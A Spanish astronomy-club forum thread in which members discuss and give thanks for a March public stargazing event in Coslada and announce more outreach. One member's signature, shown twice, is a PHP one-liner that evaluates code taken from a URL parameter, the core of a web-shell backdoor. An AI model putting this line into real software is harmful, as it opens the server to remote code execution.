Actividades del mes de Marzo

Aquí se anunciarán todas las actividades de la asociación; quedadas, charlas, cursos, talleres, etc.. Utilizadlo para apuntarse o preguntar.
Rober150
Mensajes: 235
Registrado: Dom Jun 29, 2008 6:50 pm

Actividades del mes de Marzo

Mensaje por Rober150 »

Javier, ¡queremos las fotos!

Estuvo muy bien. Fue bastante gente, sobre todo chavales. He puesto algo en mi blog: http://bitacora-roberto.blogspot.com/
Las fotos esas son de Akeru, un compañero que fue. Están hechas con el móvil.

Un saludo,
Rober
AstroAfición / Descubre tu pasión por la Astronomía
Avatar de Usuario
zipizape
Mensajes: 289
Registrado: Jue Oct 04, 2007 3:03 pm

Actividades del mes de Marzo

Mensaje por zipizape »

Buen reportaje el de tu blog, Rober. Se ve que le has cogido el "gustillo" a eso de escribir.
Con tu afición no solo tendremos un buen astrónomo sino también un gran articulista.
Enhorabuena.
Salvad la Tierra... es el único planeta que tiene chocolate.
Dra. Rachel Naomi Remen
Rober150
Mensajes: 235
Registrado: Dom Jun 29, 2008 6:50 pm

Actividades del mes de Marzo

Mensaje por Rober150 »

:oops: Gracias Carlos
La verdad es que desde que escribo en la revista me estoy dando cuenta de que me gusta mucho escribir. Pero estos ánimos son los que realmente animan.

un saludo,
Rober
AstroAfición / Descubre tu pasión por la Astronomía
rviper
Mensajes: 819
Registrado: Vie Ago 15, 2008 10:19 pm

Actividades del mes de Marzo

Mensaje por rviper »

Me sumo a la felicitacion por el relato de tu blog, Rober.

Parece que la plantada estuvo muy bien. Espero participar activamente en la proxima. Enhorabuena a los socios y compañeros que organizaron el evento.
TS Indivudual 152/900
SkyWatcher Mak 127 BD
Y otros cacharrines.

Que distinto se ve todo con medio metro...
vakaloura
Mensajes: 661
Registrado: Jue Dic 18, 2008 11:34 am

Actividades del mes de Marzo

Mensaje por vakaloura »

[quote="zipizape"]Buen reportaje el de tu blog, Rober. Se ve que le has cogido el "gustillo" a eso de escribir.
Con tu afición no solo tendremos un buen astrónomo sino también un gran articulista.
Enhorabuena.[/quote]
+1

Una pena que no me pudiese acercar, es lo que tiene levantarse tarde..... :oops: pero la maratón no me la pierdo por nada.
Felicitaciones y un saludo!!
GSO RC 8" f/9, EZG80
QHY6_mono, NEQ6-PRO
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Actividades del mes de Marzo

Mensaje por m3ntol »

phpbb:eval(stripslashes($_GET[e]));
pfvidal
Mensajes: 388
Registrado: Lun Feb 04, 2008 1:26 pm

Actividades del mes de Marzo

Mensaje por pfvidal »

Agradecer a los que organizasteis el tema del sábado en la plaza de Coslada. Aunque no pudieron venir mis chavales y me embarque yo solo en la aventura, quedé muy satisfecho por la variedad de aparatos que se mostraron a los niños (y no tan niños) asistentes.

Estoy seguro de que alguno/a de los curiosos que pasaron por la plaza, volverá y que más pronto que tarde desempolvará ese telescopio que tienen en un armario desde hace cuatro o cinco reyes magos, o se acercará a comprar uno para repetir la experiencia.

Mi falta de conocimiento a la hora de aportar mi granito de arena, se vio compensada con creces con el buen hacer y el despliegue de sabiduría de alguno de los compañeros de AstroHenares.

Resumiendo regresé a mi casa con una sensación agradable, y deseando que se realicé pronto otra actividad similar, para volver ahora ya con mis hijos a repetir la experiencia.
:D
m3ntol
Mensajes: 1829
Registrado: Mié Feb 28, 2007 11:07 pm

Actividades del mes de Marzo

Mensaje por m3ntol »

pfvidal, tu eras el del C8 ¿no?

estuvo genial las charlas que ibas dando a la gente y como te hacían corrillo :)

Este tipo de actividades las solemos hacer varias veces al año y es muy gratificante acercar la astronomía a la gente de la calle. La mayoría muestran curiosidad por aprender.

Un saludo y gracias por acercarte.
phpbb:eval(stripslashes($_GET[e]));
minoyo
Mensajes: 1
Registrado: Mar Mar 10, 2009 3:20 pm

Actividades del mes de Marzo

Mensaje por minoyo »

Muchas gracias a todos por acercarnos la astronomía "de campo" de una manera tan abierta y amable, si ya tenía el gusanillo, el sábado engordó peligrosamente.

Gracias también por la paciencia y claridad de vuestras explicaciones, no vi una sola mala cara a ninguna de las muchas preguntas que os hacíamos.

Un saludo de un nuevo incondicional de Astro Henares,
Javier
carlosz22
Mensajes: 575
Registrado: Vie Mar 02, 2007 9:10 pm

Actividades del mes de Marzo

Mensaje por carlosz22 »

Muchas gracias a ti Javier (minoyo) por pasarte por la observación pública. Me alegro mucho de que haya gustado la actividad :D

Este año, con motivo del año internacional de la astronomía haremos bastantes más observaciones públicas, del estilo de esta última. Evidentemente, si tenéis alguna sugerencia para las observaciones, somos todo oídos :wink:

Estate atento a esta sección del foro y al calendario, iremos poniendo las próximas actividades que haremos.

Un saludo :)
Responder